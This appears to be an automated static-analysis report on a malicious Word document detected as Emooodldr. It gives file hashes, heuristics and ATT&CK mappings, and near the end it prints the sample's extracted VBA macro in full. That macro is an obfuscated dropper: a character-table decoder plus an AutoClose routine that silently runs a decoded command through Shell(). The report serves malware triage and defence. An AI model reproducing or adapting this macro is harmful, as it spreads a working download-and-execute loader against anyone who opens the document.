Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 90d3cad13e03fa3a…

MALICIOUS

Office (OOXML)

33.3 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-01-20
MD5: 94d2add64b1e07760e8e4d19f5990a6d SHA-1: 2304d54247853d33128b1606929b55c2e178b947 SHA-256: 90d3cad13e03fa3a586c84deacd68bf6ae37f60ea030d1efaea5fbacc1a1e93f
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an Auto_Close macro, which utilizes the Shell() function. This indicates the macro is designed to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2448 bytes
SHA-256: eb82d4b961eecc8e24d860ede2c04a0f54dbfc6f2d7bde16c81c2506541c7120
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function strutto(balzano As Integer) As String
 Dim tubatura() As Variant
 tubatura = Array("l", "g", "+", ")", "8", "X", "a", "t", "P", "x", "/", "s", "D", "j", "1", "m", "p", "?", "B", "'", ";", "O", "b", "e", "2", "o", "W", "N", "r", ",", "-", "$", "v", "3", "i", "f", "y", "I", "n", "T", "\", ":", ".", "E", "V", "u", "w", "(", "c", "h", "C", "d", "A", "=", "4", "S", "F", " ")
 Dim rasatura As Integer
 
 For rasatura = LBound(tubatura) To UBound(tubatura)
   If rasatura = balzano Then
    strutto = tubatura(rasatura)
   End If
 Next
 
End Function

Function astice(ancora As String)
    ancora = StrConv(ancora, vbUnicode)
    astice = Split(Left(ancora, Len(ancora) - 1), vbNullChar)
End Function

Function castello(roco As String) As String
  Dim inter As Integer
  Dim fucilata As String
  Dim salivare As Variant
  salivare = astice(Trim(roco))
  For rasatura = 0 To Len(roco)
  
    If (rasatura + 1) <= UBound(salivare) Then
    Dim acetone As String
    acetone = salivare(rasatura)
    rasatura = rasatura + 1
    acetone = acetone + salivare(rasatura)
    
    fucilata = fucilata + strutto(Int(acetone))
    End If
  Next
  
  castello = fucilata
End Function

Public Function treccia(flamenco As String)
  Shell flamenco, 0
End Function

Sub AutoClose()
 Call Application.Run("treccia", castello("48155142230923571048571625462328114923000057304309234857183616061111573027250857305025151506385157472723463021221323480757553611072315422723074226232250003423380703421225463800250651563400234719490707164110100606385123230138062306383642482515103834382510114516232842155135192957312338324152080812523952570257194013085056442609422309231903205755070628073008282548231111573123383241520808125239521940130850564426094223092319205747272346302122132348075755361107231542272307422623225000342338070342122546380025065155072834380147194907071641101006063851232301380623063836424825151011421649161734515311451623281903205737430547472723463021221323480757553611072315422723074226232250003423380703421225463800250651550728343801471949070716411010331442140454422433544214540410114216491619030320"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 696cf8412110b283dddc04b8346a17510e80e09ae5b2bcd5c0e1ef6480d88576
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.